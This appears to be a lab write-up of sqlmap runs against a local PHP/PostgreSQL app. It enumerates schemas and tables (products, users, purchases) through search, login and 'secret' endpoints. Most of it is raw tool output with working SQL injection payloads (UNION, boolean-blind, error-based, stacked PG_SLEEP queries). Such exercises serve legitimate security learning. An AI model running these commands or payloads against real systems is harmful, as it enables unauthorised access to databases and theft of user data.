# Using sqlmap to find information about the database used

```
kosmas:sqlmap-dev (master)$ python sqlmap.py -u "http://localhost:8080/products/search.php?product=foo" --dbs
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.5.2.26#dev}
|_ -| . [']     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:11:45 /2021-03-01/

[12:11:45] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=jfqetq780mt...16ho0u59ec'). Do you want to use those [Y/n] Y
[12:12:08] [INFO] checking if the target is protected by some kind of WAF/IPS
[12:12:08] [INFO] testing if the target URL content is stable
[12:12:08] [INFO] target URL content is stable
[12:12:08] [INFO] testing if GET parameter 'product' is dynamic
[12:12:08] [WARNING] GET parameter 'product' does not appear to be dynamic
[12:12:08] [WARNING] heuristic (basic) test shows that GET parameter 'product' might not be injectable
[12:12:08] [INFO] testing for SQL injection on GET parameter 'product'
[12:12:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:12:08] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[12:12:08] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[12:12:08] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[12:12:08] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[12:12:08] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[12:12:09] [INFO] testing 'Generic inline queries'
[12:12:09] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[12:12:19] [INFO] GET parameter 'product' appears to be 'PostgreSQL > 8.1 stacked queries (comment)' injectable 
it looks like the back-end DBMS is 'PostgreSQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'PostgreSQL' extending provided level (1) and risk (1) values? [Y/n] Y
[12:12:34] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[12:12:34] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[12:12:34] [INFO] target URL appears to be UNION injectable with 2 columns
[12:12:34] [INFO] GET parameter 'product' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
y
sqlmap identified the following injection point(s) with a total of 63 HTTP(s) requests:
---
Parameter: product (GET)
    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: product=foo';SELECT PG_SLEEP(5)--

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: product=foo' UNION ALL SELECT NULL,(CHR(113)||CHR(106)||CHR(112)||CHR(120)||CHR(113))||(CHR(72)||CHR(89)||CHR(82)||CHR(69)||CHR(120)||CHR(82)||CHR(69)||CHR(102)||CHR(109)||CHR(88)||CHR(84)||CHR(99)||CHR(103)||CHR(115)||CHR(76)||CHR(90)||CHR(75)||CHR(71)||CHR(70)||CHR(86)||CHR(68)||CHR(118)||CHR(77)||CHR(120)||CHR(75)||CHR(102)||CHR(87)||CHR(87)||CHR(122)||CHR(80)||CHR(99)||CHR(82)||CHR(111)||CHR(90)||CHR(102)||CHR(111)||CHR(67)||CHR(104)||CHR(90)||CHR(99))||(CHR(113)||CHR(98)||CHR(107)||CHR(120)||CHR(113))-- bMZc
---
[12:12:47] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux CentOS 8
web application technology: PHP 7.2.24, Apache 2.4.37, PHP
back-end DBMS: PostgreSQL
[12:12:47] [WARNING] schema names are going to be used on PostgreSQL for enumeration as the counterpart to database names on other DBMSes
[12:12:47] [INFO] fetching database (schema) names
[12:12:47] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries). Falling back to partial UNION technique
[12:12:47] [WARNING] the SQL query provided does not return any output
[12:12:47] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[12:12:47] [INFO] fetching number of databases
[12:12:47] [INFO] retrieved: 
[12:12:47] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[12:13:22] [INFO] adjusting time delay to 1 second due to good response times
3
[12:13:22] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)                                                           

[12:13:23] [INFO] retrieved: 
[12:13:23] [INFO] retrieved: 
[12:13:23] [INFO] falling back to current database
[12:13:23] [INFO] fetching current database
[12:13:23] [WARNING] on PostgreSQL you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
available databases [1]:
[*] public

[12:13:23] [INFO] fetched data logged to text files under '/home/kosmas/.local/share/sqlmap/output/localhost'

[*] ending @ 12:13:23 /2021-03-01/
```


# Use sqlmap to find the tables in the public database:

## For products

```
kosmas:sqlmap-dev (master)$ python sqlmap.py -u "http://localhost:8080/products/search.php?product=foo" -D public --tables
        ___                                                                                                                                                                                                                           
       __H__                                                                                                                                                                                                                          
 ___ ___[)]_____ ___ ___  {1.5.2.26#dev}                                                                                                                                                                                              
|_ -| . ["]     | .'| . |                                                                                                                                                                                                             
|___|_  [(]_|_|_|__,|  _|                                                                                                                                                                                                             
      |_|V...       |_|   http://sqlmap.org                                                                                                                                                                                           
                                                                                                                                                                                                                                      
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program                                                                                                                                                                       
                                                                                                                                                                                                                                      
[*] starting @ 12:28:44 /2021-03-01/                                                                                                                                                                                                  
                                                                                                                                                                                                                                      
[12:28:44] [INFO] resuming back-end DBMS 'postgresql'                                                                                                                                                                                 
[12:28:44] [INFO] testing connection to the target URL                                                                                                                                                                                
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=6olqddkfcen...k7vg5qq36b'). Do you want to use those [Y/n] Y                                                                                           
sqlmap resumed the following injection point(s) from stored session:                                                                                                                                                                  
---                                                                                                                                                                                                                                   
Parameter: product (GET)                                                                                                                                                                                                              
    Type: stacked queries                                                                                                                                                                                                             
    Title: PostgreSQL > 8.1 stacked queries (comment)                                                                                                                                                                                 
    Payload: product=foo';SELECT PG_SLEEP(5)--

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: product=foo' UNION ALL SELECT NULL,(CHR(113)||CHR(106)||CHR(112)||CHR(120)||CHR(113))||(CHR(72)||CHR(89)||CHR(82)||CHR(69)||CHR(120)||CHR(82)||CHR(69)||CHR(102)||CHR(109)||CHR(88)||CHR(84)||CHR(99)||CHR(103)||CHR(115)||CHR(76)||CHR(90)||CHR(75)||CHR(71)||CHR(70)||CHR(86)||CHR(68)||CHR(118)||CHR(77)||CHR(120)||CHR(75)||CHR(102)||CHR(87)||CHR(87)||CHR(122)||CHR(80)||CHR(99)||CHR(82)||CHR(111)||CHR(90)||CHR(102)||CHR(111)||CHR(67)||CHR(104)||CHR(90)||CHR(99))||(CHR(113)||CHR(98)||CHR(107)||CHR(120)||CHR(113))-- bMZc
---
[12:28:48] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux CentOS 8
web application technology: PHP 7.2.24, Apache 2.4.37, PHP
back-end DBMS: PostgreSQL
[12:28:48] [INFO] fetching tables for database: 'public'
Database: public
[1 table]
+----------+
| products |
+----------+

[12:28:48] [INFO] fetched data logged to text files under '/home/kosmas/.local/share/sqlmap/output/localhost'

[*] ending @ 12:28:48 /2021-03-01/
```

## For users

```
kosmas:sqlmap-dev (master)$ python sqlmap.py -u "http://localhost:8080/login.php" --data "username=user&password=pswd" -p "username,password" --method POST -D public --tables
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.5.2.26#dev}
|_ -| . [']     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:32:31 /2021-03-01/

[12:32:31] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=u87itcmr8b8...97kd2im66o'). Do you want to use those [Y/n] Y
[12:32:34] [INFO] checking if the target is protected by some kind of WAF/IPS
[12:32:34] [INFO] testing if the target URL content is stable
[12:32:34] [INFO] target URL content is stable
[12:32:34] [INFO] heuristic (basic) test shows that POST parameter 'username' might be injectable (possible DBMS: 'PostgreSQL')
[12:32:34] [INFO] testing for SQL injection on POST parameter 'username'
it looks like the back-end DBMS is 'PostgreSQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'PostgreSQL' extending provided level (1) and risk (1) values? [Y/n] Y
[12:32:42] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:32:43] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[12:32:43] [INFO] testing 'Generic inline queries'
[12:32:43] [INFO] testing 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)'
[12:32:43] [INFO] POST parameter 'username' appears to be 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)' injectable (with --not-string="12")
[12:32:43] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[12:32:43] [INFO] POST parameter 'username' is 'PostgreSQL AND error-based - WHERE or HAVING clause' injectable 
[12:32:43] [INFO] testing 'PostgreSQL inline queries'
[12:32:43] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[12:32:43] [WARNING] time-based comparison requires larger statistical model, please wait........ (done)                                                                                                                             
[12:32:53] [INFO] POST parameter 'username' appears to be 'PostgreSQL > 8.1 stacked queries (comment)' injectable 
[12:32:53] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[12:33:03] [INFO] POST parameter 'username' appears to be 'PostgreSQL > 8.1 AND time-based blind' injectable 
[12:33:03] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
[12:33:09] [INFO] heuristic (basic) test shows that POST parameter 'password' might be injectable (possible DBMS: 'PostgreSQL')
[12:33:09] [INFO] testing for SQL injection on POST parameter 'password'
[12:33:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:33:10] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[12:33:10] [INFO] testing 'Generic inline queries'
[12:33:10] [INFO] testing 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)'
[12:33:10] [INFO] POST parameter 'password' appears to be 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)' injectable 
[12:33:10] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[12:33:10] [INFO] POST parameter 'password' is 'PostgreSQL AND error-based - WHERE or HAVING clause' injectable 
[12:33:10] [INFO] testing 'PostgreSQL inline queries'
[12:33:10] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[12:33:20] [INFO] POST parameter 'password' appears to be 'PostgreSQL > 8.1 stacked queries (comment)' injectable 
[12:33:20] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[12:33:30] [INFO] POST parameter 'password' appears to be 'PostgreSQL > 8.1 AND time-based blind' injectable 
[12:33:30] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
POST parameter 'password' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 62 HTTP(s) requests:
---
Parameter: password (POST)
    Type: boolean-based blind
    Title: PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)
    Payload: username=user&password=pswd' AND (SELECT (CASE WHEN (7468=7468) THEN NULL ELSE CAST((CHR(76)||CHR(72)||CHR(109)||CHR(90)) AS NUMERIC) END)) IS NULL-- HQSI

    Type: error-based
    Title: PostgreSQL AND error-based - WHERE or HAVING clause
    Payload: username=user&password=pswd' AND 9649=CAST((CHR(113)||CHR(98)||CHR(118)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (9649=9649) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(107)||CHR(120)||CHR(112)||CHR(113)) AS NUMERIC)-- RoqR

    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: username=user&password=pswd';SELECT PG_SLEEP(5)--

    Type: time-based blind
    Title: PostgreSQL > 8.1 AND time-based blind
    Payload: username=user&password=pswd' AND 7616=(SELECT 7616 FROM PG_SLEEP(5))-- oiOF

Parameter: username (POST)
    Type: boolean-based blind
    Title: PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)
    Payload: username=user' AND (SELECT (CASE WHEN (9559=9559) THEN NULL ELSE CAST((CHR(119)||CHR(81)||CHR(71)||CHR(88)) AS NUMERIC) END)) IS NULL-- FUbx&password=pswd

    Type: error-based
    Title: PostgreSQL AND error-based - WHERE or HAVING clause
    Payload: username=user' AND 4241=CAST((CHR(113)||CHR(98)||CHR(118)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (4241=4241) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(107)||CHR(120)||CHR(112)||CHR(113)) AS NUMERIC)-- tDlm&password=pswd

    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: username=user';SELECT PG_SLEEP(5)--&password=pswd

    Type: time-based blind
    Title: PostgreSQL > 8.1 AND time-based blind
    Payload: username=user' AND 1719=(SELECT 1719 FROM PG_SLEEP(5))-- rcAx&password=pswd
---
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: username, type: Single quoted string (default)
[1] place: POST, parameter: password, type: Single quoted string
[q] Quit
> 0
[12:34:00] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux CentOS 8
web application technology: PHP 7.2.24, Apache 2.4.37, PHP
back-end DBMS: PostgreSQL
[12:34:00] [INFO] fetching tables for database: 'public'
[12:34:00] [INFO] retrieved: 'users'
Database: public
[1 table]
+-------+
| users |
+-------+

[12:34:00] [INFO] fetched data logged to text files under '/home/kosmas/.local/share/sqlmap/output/localhost'

[*] ending @ 12:34:00 /2021-03-01/
```

## Secret endpoint table

```
kosmas:sqlmap-dev (master)$ python sqlmap.py -u "http://localhost:8080/secret.php?id=1"  --method GET -D public --tables
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.5.2.26#dev}
|_ -| . [)]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 14:19:10 /2021-03-01/

[14:19:10] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=l0gsvb0neg8...hiafgjvdee'). Do you want to use those [Y/n] 

[14:19:11] [INFO] testing if the target URL content is stable
[14:19:11] [INFO] target URL content is stable
[14:19:11] [INFO] testing if GET parameter 'id' is dynamic
[14:19:11] [INFO] GET parameter 'id' appears to be dynamic
[14:19:11] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[14:19:11] [INFO] testing for SQL injection on GET parameter 'id'
[14:19:11] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:19:12] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="User")
[14:19:12] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'PostgreSQL' 
it looks like the back-end DBMS is 'PostgreSQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] 

for the remaining tests, do you want to include all tests for 'PostgreSQL' extending provided level (1) and risk (1) values? [Y/n] 

[14:19:15] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[14:19:15] [INFO] testing 'PostgreSQL OR error-based - WHERE or HAVING clause'
[14:19:15] [INFO] testing 'PostgreSQL error-based - Parameter replace'
[14:19:15] [INFO] testing 'PostgreSQL error-based - Parameter replace (GENERATE_SERIES)'
[14:19:15] [INFO] testing 'Generic inline queries'
[14:19:15] [INFO] testing 'PostgreSQL inline queries'
[14:19:15] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[14:19:25] [INFO] GET parameter 'id' appears to be 'PostgreSQL > 8.1 stacked queries (comment)' injectable 
[14:19:25] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[14:19:35] [INFO] GET parameter 'id' appears to be 'PostgreSQL > 8.1 AND time-based blind' injectable 
[14:19:35] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[14:19:35] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[14:19:35] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[14:19:35] [INFO] target URL appears to have 4 columns in query
do you want to (re)try to find proper UNION column types with fuzzy test? [y/N] 

injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] 

[14:19:39] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql') 
[14:19:40] [INFO] target URL appears to be UNION injectable with 4 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] 

[14:19:42] [INFO] checking if the injection point on GET parameter 'id' is a false positive
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 

sqlmap identified the following injection point(s) with a total of 141 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 9869=9869 AND 'Irmg'='Irmg

    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: id=1';SELECT PG_SLEEP(5)--

    Type: time-based blind
    Title: PostgreSQL > 8.1 AND time-based blind
    Payload: id=1' AND 4724=(SELECT 4724 FROM PG_SLEEP(5)) AND 'IQWN'='IQWN
---
[14:19:44] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux CentOS 8
web application technology: PHP 7.2.24, Apache 2.4.37, PHP
back-end DBMS: PostgreSQL
[14:19:44] [INFO] fetching tables for database: 'public'
[14:19:44] [INFO] fetching number of tables for database 'public'
[14:19:44] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[14:19:44] [INFO] retrieved: 1
[14:19:44] [INFO] retrieved: purchases
Database: public
[1 table]
+-----------+
| purchases |
+-----------+

[14:19:45] [INFO] fetched data logged to text files under '/home/kosmas/.local/share/sqlmap/output/localhost'

[*] ending @ 14:19:45 /2021-03-01/
```


